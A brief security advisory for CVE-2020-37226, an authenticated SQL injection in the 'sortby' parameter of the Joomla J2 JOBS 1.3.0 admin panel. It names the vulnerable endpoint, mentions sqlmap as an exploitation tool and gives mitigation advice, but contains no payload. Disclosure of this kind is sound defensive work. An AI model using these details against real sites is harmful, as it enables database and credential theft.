CVE-2020-37226

The vulnerability is an authenticated SQL injection in Joomla J2 JOBS version 1.3.0. The 'sortby' parameter, used for sorting job listings in the administrator interface, is not properly sanitized, allowing an attacker to inject arbitrary SQL commands.

An attacker must be authenticated to the Joomla administrator panel. The attack is performed via a crafted POST request to /administrator/index.php, with malicious SQL code placed in the 'sortby' parameter. Automated tools like sqlmap can be used to exploit this, as demonstrated in the public exploit [3]. The vulnerable endpoint is accessible with a valid session cookie, and the attacker does not need special privileges beyond authentication.

Successful exploitation allows an attacker to read sensitive data from the underlying database, including user credentials, configuration details, and other application data. Because the database may contain hashed passwords and personal information, this can lead to further compromise of the application and its users [4].

As of the advisory publication, users should upgrade to a patched version if available, or apply input sanitization to the 'sortby' parameter. Given the authenticated requirement, limiting administrator access to trusted users can mitigate risk, but the vendor should provide a security update [1][2].